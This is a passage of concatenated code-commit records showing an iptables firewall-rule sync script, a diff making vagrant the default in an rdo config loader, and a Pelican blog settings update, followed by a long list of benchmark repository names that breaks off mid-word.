rules.add_allowed_ip(ip)
found_ips.append(ip)
for port_rule in config['hostnames'][hostname]['firewall']:
rules.add_port_rule(*port_rule)
for ip in found_ips:
if ip not in rules.rules['allowed_ips']:
rules.remove_allowed_ip(ip)
rules.update_firewall()
rules.save()
if __name__ == '__main__':
sys.exit(main()) | #! /usr/bin/python
import sys
import os
import json
import socket
import ext.iptables as ipt
class ElasticRules():
rules = {
'allowed_ips': {},
'ports': {},
}
def add_port_rule(self, port, whom, type):
key = "%s:%s:%s" % (port, type, whom)
self.rules['ports'][key] = (port, whom, type)
def remove_port_rule(self, port, whom, type):
key = "%s:%s:%s" % (port, type, whom)
if key not in self.rules['ports']:
return None
del self.rules['ports'][key]
def add_allowed_ip(self, ip):
self.rules['allowed_ips'][ip] = True
def remove_allowed_ip(self, ip):
if ip not in self.rules:
return None
self.rules['allowed_ips'][ip] = False
def load(self):
try:
self.rules = json.loads(open('./rules.json').read())
except:
pass
def save(self):
for ip, allowed in self.rules['allowed_ips'].iteritems():
if not allowed:
del self.rules['allowed_ips'][ip]
return open('./rules.json', 'w').write(json.dumps(self.rules, separators=(',', ':')))
def update_firewall(self):
for key, rule in self.rules['ports'].iteritems():
if rule[1] == 'any':
ipt.all_new(rule[0], rule[2])
else:
for ip in self.rules['allowed_ips']:
ipt.ip_new(ip, rule[0], rule[2])
def main():
rules = ElasticRules()
rules.load()
config = json.loads(open('./config.json').read())
# I hate exec. Keep an eye out for better solutions to this
exec "from api.%s import Api" % config['server_group']
api = Api()
for key in config[config['server_group']]:
setattr(api, key, config[config['server_group']][key])
api.grab_servers()
found_ips = []
hostname = socket.gethostname()
if hostname in config['hostnames']:
for server in config['hostnames'][hostname]['allow']:
for ip in api.get_servers(server):
rules.add_allowed_ip(ip)
found_ips.append(ip)
for ip in config['hostnames'][hostname]['safe_ips']:
rules.add_allowed_ip(ip)
found_ips.append(ip)
for port_rule in config['hostnames'][hostname]['firewall']:
rules.add_port_rule(*port_rule)
for ip in found_ips:
if ip not in rules.rules['allowed_ips']:
rules.remove_allowed_ip(ip)
rules.update_firewall()
rules.save()
if __name__ == '__main__':
sys.exit(main()) | mit | Python |
0e5db5420b941574f7074e716159d85b3097ae58 | use vagrant as the default. | ionrock/rdo | rdo/config.py | rdo/config.py | import os
import functools
from ConfigParser import ConfigParser
# Use vagrant by default
DEFAULTS = {
'driver': 'vagrant',
'directory': '/vagrant'
}
def get_config(config_file='.rdo.conf'):
config = ConfigParser()
config.read(config_file)
env = os.environ.get('RDO_ENV') or 'default'
try:
return dict(config.items(env))
except ConfigParser.NoSectionError:
return DEFAULTS
if __name__ == '__main__':
c = Config('example.conf')
c.parse()
print(c.get('driver'))
| import os
import functools
from ConfigParser import ConfigParser
def get_config(config_file='.rdo.conf'):
config = ConfigParser()
config.read(config_file)
env = os.environ.get('RDO_ENV') or 'default'
return dict(config.items(env))
if __name__ == '__main__':
c = Config('example.conf')
c.parse()
print(c.get('driver'))
| bsd-3-clause | Python |
ac1d6923e0dc682698f808e6401c4686348f4c33 | Update to new settings | danielfrg/danielfrg.github.io-source,danielfrg/danielfrg.github.io-source,danielfrg/danielfrg.github.io-source | pelicanconf.py | pelicanconf.py | from __future__ import unicode_literals
LOAD_CONTENT_CACHE = False
SITEURL = ''
# SITEURL = 'http://danielfrg.github.io'
AUTHOR = u'Daniel Rodriguez'
SITENAME = u'Daniel Rodriguez'
TIMEZONE = 'UTC'
DEFAULT_LANG = 'en'
MARKUP = ('md', 'ipynb')
DEFAULT_DATE_FORMAT = '%B %d, %Y'
SUMMARY_MAX_LENGTH = 150
DEFAULT_PAGINATION = 10
PAGE_DIRS = ['pages']
ARTICLE_DIRS = ['articles']
THEME = 'theme'
STATIC_PATHS = ['images']
ARTICLE_URL = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/'
ARTICLE_SAVE_AS = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html'
PAGE_SAVE_AS = '{category}/{slug}.html'
PAGE_URL = PAGE_SAVE_AS
MARKDOWN = {
'extension_configs': {
'markdown.extensions.codehilite': {'css_class': 'codehilite'},
'markdown.extensions.extra': {},
'markdown.extensions.meta': {},
},
'output_format': 'html5',
}
# Paths are relative to `content`
STATIC_PATHS = ['images', 'favicon.ico', '404.html', 'robots.txt', 'CNAME']
# THEME SETTINGS
DEFAULT_HEADER_BG = '/images/station1.jpg'
ABOUT_PAGE = '/pages/about.html'
TWITTER_USERNAME = 'danielfrg'
GITHUB_USERNAME = 'danielfrg'
SHOW_ARCHIVES = True
SHOW_FEED = True
GOOGLE_ANALYTICS_CODE = 'UA-35523657-2'
GOOGLE_ANALYTICS_DOMAIN = 'danielfrg.com'
# PLUGINS SETTINGS
PLUGIN_PATHS = ['plugins']
PLUGINS = ['sitemap', 'ipynb.markup', 'ipynb.liquid', 'liquid_tags.youtube', 'liquid_tags.b64img']
SITEMAP = {
'format': 'xml'
}
IPYNB_EXTEND_STOP_SUMMARY_TAGS = [('h2', None), ('ol', None), ('ul', None)]
| from __future__ import unicode_literals
LOAD_CONTENT_CACHE = False
SITEURL = ''
# SITEURL = 'http://danielfrg.github.io'
AUTHOR = u'Daniel Rodriguez'
SITENAME = u'Daniel Rodriguez'
TIMEZONE = 'UTC'
DEFAULT_LANG = 'en'
MARKUP = ('md', 'ipynb')
DEFAULT_DATE_FORMAT = '%B %d, %Y'
SUMMARY_MAX_LENGTH = 150
DEFAULT_PAGINATION = 10
PAGE_DIRS = ['pages']
ARTICLE_DIRS = ['articles']
THEME = 'theme'
STATIC_PATHS = ['images']
ARTICLE_URL = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/'
ARTICLE_SAVE_AS = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html'
PAGE_SAVE_AS = '{category}/{slug}.html'
PAGE_URL = PAGE_SAVE_AS
MD_EXTENSIONS = ['codehilite(css_class=codehilite)', 'extra']
# Paths are relative to `content`
STATIC_PATHS = ['images', 'favicon.ico', '404.html', 'robots.txt', 'CNAME']
# THEME SETTINGS
DEFAULT_HEADER_BG = '/images/station1.jpg'
ABOUT_PAGE = '/pages/about.html'
TWITTER_USERNAME = 'danielfrg'
GITHUB_USERNAME = 'danielfrg'
SHOW_ARCHIVES = True
SHOW_FEED = True
GOOGLE_ANALYTICS_CODE = 'UA-35523657-2'
GOOGLE_ANALYTICS_DOMAIN = 'danielfrg.com'
# PLUGINS SETTINGS
PLUGIN_PATHS = ['plugins']
PLUGINS = ['sitemap', 'ipynb.markup', 'liquid_tags.youtube', 'liquid_tags.b64img']
SITEMAP = {
'format': 'xml'
}
IPYNB_EXTEND_STOP_SUMMARY_TAGS = [('h2', None), ('ol', None), ('ul', None)]
| apache-2.0 | Python |
9caeab6005ca0508f7045c869def5962edb48ed1 | verify Fixed a bug with the stop command for plain | sxend/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,ashawnbandy-te-tfb/FrameworkBenchmarks,kellabyte/FrameworkBenchmarks,seem-sky/FrameworkBenchmarks,methane/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,sagenschneider/FrameworkBenchmarks,Synchro/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,actframework/FrameworkBenchmarks,martin-g/FrameworkBenchmarks,methane/FrameworkBenchmarks,martin-g/FrameworkBenchmarks,seem-sky/FrameworkBenchmarks,denkab/FrameworkBenchmarks,zloster/FrameworkBenchmarks,joshk/FrameworkBenchmarks,lcp0578/FrameworkBenchmarks,zhuochenKIDD/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,Verber/FrameworkBenchmarks,Verber/FrameworkBenchmarks,F3Community/FrameworkBenchmarks,leafo/FrameworkBenchmarks,nkasvosve/FrameworkBenchmarks,sxend/FrameworkBenchmarks,knewmanTE/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,sanjoydesk/FrameworkBenchmarks,diablonhn/FrameworkBenchmarks,martin-g/FrameworkBenchmarks,nathana1/FrameworkBenchmarks,circlespainter/FrameworkBenchmarks,jaguililla/FrameworkBenchmarks,actframework/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,kostya-sh/FrameworkBenchmarks,khellang/FrameworkBenchmarks,victorbriz/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,jamming/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,denkab/FrameworkBenchmarks,ratpack/FrameworkBenchmarks,khellang/FrameworkBenchmarks,grob/FrameworkBenchmarks,kostya-sh/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,sanjoydesk/FrameworkBenchmarks,yunspace/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,testn/FrameworkBenchmarks,denkab/FrameworkBenchmarks,jebbstewart/FrameworkBenchmarks,seem-sky/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,nathana1/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,circlespainter/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,Eyepea/FrameworkBenchmarks,psfblair/FrameworkBenchmarks,thousandsofthem/FrameworkBenchmarks,knewmanTE/FrameworkBenchmarks,sxend/FrameworkBenchmarks,s-ludwig/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,xitrum-framework/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,jaguililla/FrameworkBenchmarks,ashawnbandy-te-tfb/FrameworkBenchmarks,fabianmurariu/FrameworkBenchmarks,psfblair/FrameworkBenchmarks,Eyepea/FrameworkBenchmarks,valyala/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,kellabyte/FrameworkBenchmarks,sxend/FrameworkBenchmarks,leafo/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,F3Community/FrameworkBenchmarks,testn/FrameworkBenchmarks,knewmanTE/FrameworkBenchmarks,zhuochenKIDD/FrameworkBenchmarks,Jesterovskiy/FrameworkBenchmarks,dmacd/FB-try1,Synchro/FrameworkBenchmarks,youprofit/FrameworkBenchmarks,PermeAgility/FrameworkBenchmarks,victorbriz/FrameworkBenchmarks,hamiltont/FrameworkBenchmarks,testn/FrameworkBenchmarks,ratpack/FrameworkBenchmarks,kostya-sh/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,kbrock/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,herloct/FrameworkBenchmarks,Rayne/FrameworkBenchmarks,alubbe/FrameworkBenchmarks,hperadin/FrameworkBenchmarks,jaguililla/FrameworkBenchmarks,victorbriz/FrameworkBenchmarks,lcp0578/FrameworkBenchmarks,jebbstewart/FrameworkBenchmarks,zhuochenKIDD/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,circlespainter/FrameworkBenchmarks,zhuochenKIDD/FrameworkBenchmarks,doom369/FrameworkBenchmarks,saturday06/FrameworkBenchmarks,Jesterovskiy/FrameworkBenchmarks,donovanmuller/FrameworkBenchmarks,Ocramius/FrameworkBenchmarks,Rayne/FrameworkBenchmarks,torhve/FrameworkBenchmarks,khellang/FrameworkBenchmarks,Verber/FrameworkBenchmarks,grob/FrameworkBenchmarks,Jesterovskiy/FrameworkBenchmarks,greg-hellings/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,Eyepea/FrameworkBenchmarks,ratpack/FrameworkBenchmarks,kbrock/FrameworkBenchmarks,seem-sky/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,victorbriz/FrameworkBenchmarks,actframework/FrameworkBenchmarks,marko-asplund/FrameworkBenchmarks,Jesterovskiy/FrameworkBenchmarks,hamiltont/FrameworkBenchmarks,denkab/FrameworkBenchmarks,joshk/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,torhve/FrameworkBenchmarks,greg-hellings/FrameworkBenchmarks,fabianmurariu/FrameworkBenchmarks,zdanek/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,Synchro/FrameworkBenchmarks,herloct/FrameworkBenchmarks,leafo/FrameworkBenchmarks,Rayne/FrameworkBenchmarks,psfblair/FrameworkBenchmarks,lcp0578/FrameworkBenchmarks,PermeAgility/FrameworkBenchmarks,fabianmurariu/FrameworkBenchmarks,khellang/FrameworkBenchmarks,marko-asplund/FrameworkBenchmarks,yunspace/FrameworkBenchmarks,yunspace/FrameworkBenchmarks,markkolich/FrameworkBenchmarks,s-ludwig/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,PermeAgility/FrameworkBenchmarks,grob/FrameworkBenchmarks,diablonhn/FrameworkBenchmarks,markkolich/FrameworkBenchmarks,doom369/FrameworkBenchmarks,jamming/FrameworkBenchmarks,greg-hellings/FrameworkBenchmarks,psfblair/FrameworkBenchmarks,fabianmurariu/FrameworkBenchmarks,mfirry/FrameworkBenchmarks,valyala/FrameworkBenchmarks,denkab/FrameworkBenchmarks,Eyepea/FrameworkBenchmarks,zdanek/FrameworkBenchmarks,ashawnbandy-te-tfb/FrameworkBenchmarks,mfirry/FrameworkBenchmarks,markkolich/FrameworkBenchmarks,alubbe/FrameworkBenchmarks,joshk/FrameworkBenchmarks,kostya-sh/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,torhve/FrameworkBenchmarks,youprofit/FrameworkBenchmarks,jamming/FrameworkBenchmarks,yunspace/FrameworkBenchmarks,nathana1/FrameworkBenchmarks,kostya-sh/FrameworkBenchmarks,ratpack/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,hamiltont/FrameworkBenchmarks,zane-techempower/FrameworkBenchmarks,PermeAgility/FrameworkBenchmarks,Rydgel/FrameworkBenchmarks,F3Community/FrameworkBenchmarks,zapov/FrameworkBenchmarks,fabianmurariu/FrameworkBenchmarks,herloct/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,sgml/FrameworkBenchmarks,PermeAgility/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,youprofit/FrameworkBenchmarks,jamming/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,donovanmuller/FrameworkBenchmarks,seem-sky/FrameworkBenchmarks,zane-techempower/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,zdanek/FrameworkBenchmarks,marko-asplund/FrameworkBenchmarks,kbrock/FrameworkBenchmarks,s-ludwig/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,jamming/FrameworkBenchmarks,ashawnbandy-te-tfb/FrameworkBenchmarks,knewmanTE/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,khellang/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,s-ludwig/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,testn/FrameworkBenchmarks,kostya-sh/FrameworkBenchmarks,alubbe/FrameworkBenchmarks,greg-hellings/FrameworkBenchmarks,zloster/FrameworkBenchmarks,actframework/FrameworkBenchmarks,zapov/FrameworkBenchmarks,valyala/FrameworkBenchmarks,thousandsofthem/FrameworkBenchmarks,waiteb3/FrameworkBenchmarks,diablonhn/FrameworkBenchmarks,greg-hellings/FrameworkBenchmarks,doom369/FrameworkBenchmarks,alubbe/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,hamiltont/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,victorbriz/FrameworkBenchmarks,diablonhn/FrameworkBenchmarks,doom369/FrameworkBenchmarks,lcp0578/FrameworkBenchmarks,sgml/FrameworkBenchmarks,actframework/FrameworkBenchmarks,s-ludwig/FrameworkBenchmarks,sagenschneider/FrameworkBenchmarks,PermeAgility/FrameworkBenchmarks,victorbriz/FrameworkBenchmarks,Rydgel/FrameworkBenchmarks,F3Community/FrameworkBenchmarks,yunspace/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,knewmanTE/FrameworkBenchmarks,martin-g/FrameworkBenchmarks,Verber/FrameworkBenchmarks,kostya-sh/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,zhuochenKIDD/FrameworkBenchmarks,marko-asplund/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,sanjoydesk/FrameworkBenchmarks,psfblair/FrameworkBenchmarks,martin-g/FrameworkBenchmarks,psfblair/FrameworkBenchmarks,jaguililla/FrameworkBenchmarks,psfblair/FrameworkBenchmarks,fabianmurariu/FrameworkBenchmarks,ratpack/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,doom369/FrameworkBenchmarks,markkolich/FrameworkBenchmarks,torhve/FrameworkBenchmarks,xitrum-framework/FrameworkBenchmarks,seem-sky/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,xitrum-framework/FrameworkBenchmarks,jaguililla/FrameworkBenchmarks,Verber/FrameworkBenchmarks,zapov/FrameworkBenchmarks,greg-hellings/FrameworkBenchmarks,jebbstewart/FrameworkBenchmarks,zloster/FrameworkBenchmarks,Eyepea/FrameworkBenchmarks,sanjoydesk/FrameworkBenchmarks,sgml/FrameworkBenchmarks,zloster/FrameworkBenchmarks,Ocramius/FrameworkBenchmarks,Verber/FrameworkBenchmarks,PermeAgility/FrameworkBenchmarks,zloster/FrameworkBenchmarks,torhve/FrameworkBenchmarks,alubbe/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,yunspace/FrameworkBenchmarks,donovanmuller/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,zdanek/FrameworkBenchmarks,Rayne/FrameworkBenchmarks,zloster/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,F3Community/FrameworkBenchmarks,sagenschneider/FrameworkBenchmarks,valyala/FrameworkBenchmarks,denkab/FrameworkBenchmarks,zloster/FrameworkBenchmarks,greg-hellings/FrameworkBenchmarks,sgml/FrameworkBenchmarks,denkab/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,fabianmurariu/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,nathana1/FrameworkBenchmarks,actframework/FrameworkBenchmarks,joshk/FrameworkBenchmarks,nkasvosve/FrameworkBenchmarks,lcp0578/FrameworkBenchmarks,Jesterovskiy/FrameworkBenchmarks,dmacd/FB-try1,victorbriz/FrameworkBenchmarks,marko-asplund/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,Ocramius/FrameworkBenchmarks,zloster/FrameworkBenchmarks,waiteb3/FrameworkBenchmarks,hamiltont/FrameworkBenchmarks,hamiltont/FrameworkBenchmarks,knewmanTE/FrameworkBenchmarks,markkolich/FrameworkBenchmarks,sxend/FrameworkBenchmarks,F3Community/FrameworkBenchmarks,methane/FrameworkBenchmarks,testn/FrameworkBenchmarks,Verber/FrameworkBenchmarks,grob/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,Rayne/FrameworkBenchmarks,Rayne/FrameworkBenchmarks,psfblair/FrameworkBenchmarks,s-ludwig/FrameworkBenchmarks,khellang/FrameworkBenchmarks,saturday06/FrameworkBenchmarks,youprofit/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,knewmanTE/FrameworkBenchmarks,nkasvosve/FrameworkBenchmarks,zane-techempower/FrameworkBenchmarks,donovanmuller/FrameworkBenchmarks,zane-techempower/FrameworkBenchmarks,testn/FrameworkBenchmarks,denkab/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,mfirry/FrameworkBenchmarks,circlespainter/FrameworkBenchmarks,Synchro/FrameworkBenchmarks,thousandsofthem/FrameworkBenchmarks,fabianmurariu/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,grob/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,sanjoydesk/FrameworkBenchmarks,s-ludwig/FrameworkBenchmarks,ashawnbandy-te-tfb/FrameworkBenchmarks,jebbstewart/FrameworkBenchmarks,psfblair/FrameworkBenchmarks,valyala/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,doom369/FrameworkBenchmarks,yunspace/FrameworkBenchmarks,herloct/FrameworkBenchmarks,marko-asplund/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,thousandsofthem/FrameworkBenchmarks,PermeAgility/FrameworkBenchmarks,xitrum-framework/FrameworkBenchmarks,zdanek/FrameworkBenchmarks,dmacd/FB-try1,jeevatkm/FrameworkBenchmarks,torhve/FrameworkBenchmarks,thousandsofthem/FrameworkBenchmarks,xitrum-framework/FrameworkBenchmarks,Verber/FrameworkBenchmarks,kellabyte/FrameworkBenchmarks,zapov/FrameworkBenchmarks,actframework/FrameworkBenchmarks,saturday06/FrameworkBenchmarks,nathana1/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,doom369/FrameworkBenchmarks,psfblair/FrameworkBenchmarks,kbrock/FrameworkBenchmarks,knewmanTE/FrameworkBenchmarks,grob/FrameworkBenchmarks,sagenschneider/FrameworkBenchmarks,valyala/FrameworkBenchmarks,jebbstewart/FrameworkBenchmarks,testn/FrameworkBenchmarks,torhve/FrameworkBenchmarks,Synchro/FrameworkBenchmarks,Rydgel/FrameworkBenchmarks,jamming/FrameworkBenchmarks,kostya-sh/FrameworkBenchmarks,youprofit/FrameworkBenchmarks,jebbstewart/FrameworkBenchmarks,hperadin/FrameworkBenchmarks,greg-hellings/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,Ocramius/FrameworkBenchmarks,Rayne/FrameworkBenchmarks,Rydgel/FrameworkBenchmarks,hamiltont/FrameworkBenchmarks,khellang/FrameworkBenchmarks,zhuochenKIDD/FrameworkBenchmarks,zloster/FrameworkBenchmarks,waiteb3/FrameworkBenchmarks,knewmanTE/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,joshk/FrameworkBenchmarks,jaguililla/FrameworkBenchmarks,testn/FrameworkBenchmarks,thousandsofthem/FrameworkBenchmarks,xitrum-framework/FrameworkBenchmarks,leafo/FrameworkBenchmarks,Rydgel/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,thousandsofthem/FrameworkBenchmarks,psfblair/FrameworkBenchmarks,fabianmurariu/FrameworkBenchmarks,thousandsofthem/FrameworkBenchmarks,jebbstewart/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,jebbstewart/FrameworkBenchmarks,nathana1/FrameworkBenchmarks,zapov/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,waiteb3/FrameworkBenchmarks,doom369/FrameworkBenchmarks,zane-techempower/FrameworkBenchmarks,grob/FrameworkBenchmarks,sgml/FrameworkBenchmarks,Rydgel/FrameworkBenchmarks,sxend/FrameworkBenchmarks,ashawnbandy-te-tfb/FrameworkBenchmarks,nkasvosve/FrameworkBenchmarks,joshk/FrameworkBenchmarks,diablonhn/FrameworkBenchmarks,jebbstewart/FrameworkBenchmarks,waiteb3/FrameworkBenchmarks,kostya-sh/FrameworkBenchmarks,jaguililla/FrameworkBenchmarks,Jesterovskiy/FrameworkBenchmarks,kostya-sh/FrameworkBenchmarks,zane-techempower/FrameworkBenchmarks,sxend/FrameworkBenchmarks,Jesterovskiy/FrameworkBenchmarks,sanjoydesk/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,marko-asplund/FrameworkBenchmarks,jaguililla/FrameworkBenchmarks,leafo/FrameworkBenchmarks,seem-sky/FrameworkBenchmarks,Synchro/FrameworkBenchmarks,kostya-sh/FrameworkBenchmarks,testn/FrameworkBenchmarks,xitrum-framework/FrameworkBenchmarks,dmacd/FB-try1,alubbe/FrameworkBenchmarks,Rydgel/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,doom369/FrameworkBenchmarks,kellabyte/FrameworkBenchmarks,methane/FrameworkBenchmarks,lcp0578/FrameworkBenchmarks,kostya-sh/FrameworkBenchmarks,sxend/FrameworkBenchmarks,fabianmurariu/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,zdanek/FrameworkBenchmarks,donovanmuller/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,youprofit/FrameworkBenchmarks,ratpack/FrameworkBenchmarks,yunspace/FrameworkBenchmarks,sagenschneider/FrameworkBenchmarks,hperadin/FrameworkBenchmarks,jamming/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,Jesterovskiy/FrameworkBenchmarks,sxend/FrameworkBenchmarks,victorbriz/FrameworkBenchmarks,Ocramius/FrameworkBenchmarks,zapov/FrameworkBenchmarks,Rayne/FrameworkBenchmarks,sanjoydesk/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,zloster/FrameworkBenchmarks,hperadin/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,denkab/FrameworkBenchmarks,s-ludwig/FrameworkBenchmarks,F3Community/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,nkasvosve/FrameworkBenchmarks,marko-asplund/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,sgml/FrameworkBenchmarks,Rydgel/FrameworkBenchmarks,jamming/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,Synchro/FrameworkBenchmarks,seem-sky/FrameworkBenchmarks,jebbstewart/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,joshk/FrameworkBenchmarks,victorbriz/FrameworkBenchmarks,victorbriz/FrameworkBenchmarks,s-ludwig/FrameworkBenchmarks,denkab/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,kbrock/FrameworkBenchmarks,diablonhn/FrameworkBenchmarks,F3Community/FrameworkBenchmarks,nathana1/FrameworkBenchmarks,zane-techempower/FrameworkBenchmarks,markkolich/FrameworkBenchmarks,saturday06/FrameworkBenchmarks,leafo/FrameworkBenchmarks,kostya-sh/FrameworkBenchmarks,Verber/FrameworkBenchmarks,valyala/FrameworkBenchmarks,hperadin/FrameworkBenchmarks,martin-g/FrameworkBenchmarks,nkasvosve/FrameworkBenchmarks,circlespainter/FrameworkBenchmarks,zhuochenKIDD/FrameworkBenchmarks,Rydgel/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,grob/FrameworkBenchmarks,Jesterovskiy/FrameworkBenchmarks,Jesterovskiy/FrameworkBenchmarks,zloster/FrameworkBenchmarks,yunspace/FrameworkBenchmarks,testn/FrameworkBenchmarks,methane/FrameworkBenchmarks,martin-g/FrameworkBenchmarks,torhve/FrameworkBenchmarks,valyala/FrameworkBenchmarks,joshk/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,sxend/FrameworkBenchmarks,donovanmuller/FrameworkBenchmarks,PermeAgility/FrameworkBenchmarks,khellang/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,victorbriz/FrameworkBenchmarks,kbrock/FrameworkBenchmarks,actframework/FrameworkBenchmarks,joshk/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,sagenschneider/FrameworkBenchmarks,marko-asplund/FrameworkBenchmarks,alubbe/FrameworkBenchmarks,Synchro/FrameworkBenchmarks,testn/FrameworkBenchmarks,yunspace/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,zdanek/FrameworkBenchmarks,Rydgel/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,jaguililla/FrameworkBenchmarks,sagenschneider/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,martin-g/FrameworkBenchmarks,sgml/FrameworkBenchmarks,saturday06/FrameworkBenchmarks,ratpack/FrameworkBenchmarks,jaguililla/FrameworkBenchmarks,zapov/FrameworkBenchmarks,Jesterovskiy/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,torhve/FrameworkBenchmarks,ratpack/FrameworkBenchmarks,Synchro/FrameworkBenchmarks,herloct/FrameworkBenchmarks,seem-sky/FrameworkBenchmarks,sanjoydesk/FrameworkBenchmarks,donovanmuller/FrameworkBenchmarks,alubbe/FrameworkBenchmarks,saturday06/FrameworkBenchmarks,thousandsofthem/FrameworkBenchmarks,zdanek/FrameworkBenchmarks,youprofit/FrameworkBenchmarks,psfblair/FrameworkBenchmarks,zloster/FrameworkBenchmarks,PermeAgility/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,sagenschneider/FrameworkBenchmarks,circlespainter/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,zane-techempower/FrameworkBenchmarks,joshk/FrameworkBenchmarks,leafo/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,zdanek/FrameworkBenchmarks,mfirry/FrameworkBenchmarks,Eyepea/FrameworkBenchmarks,methane/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,zhuochenKIDD/FrameworkBenchmarks,victorbriz/FrameworkBenchmarks,Eyepea/FrameworkBenchmarks,sanjoydesk/FrameworkBenchmarks,methane/FrameworkBenchmarks,knewmanTE/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,jamming/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,waiteb3/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,zdanek/FrameworkBenchmarks,Synchro/FrameworkBenchmarks,herloct/FrameworkBenchmarks,kbrock/FrameworkBenchmarks,zane-techempower/FrameworkBenchmarks,jamming/FrameworkBenchmarks,denkab/FrameworkBenchmarks,waiteb3/FrameworkBenchmarks,kbrock/FrameworkBenchmarks,nathana1/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,herloct/FrameworkBenchmarks,diablonhn/FrameworkBenchmarks,markkolich/FrameworkBenchmarks,grob/FrameworkBenchmarks,thousandsofthem/FrameworkBenchmarks,Rayne/FrameworkBe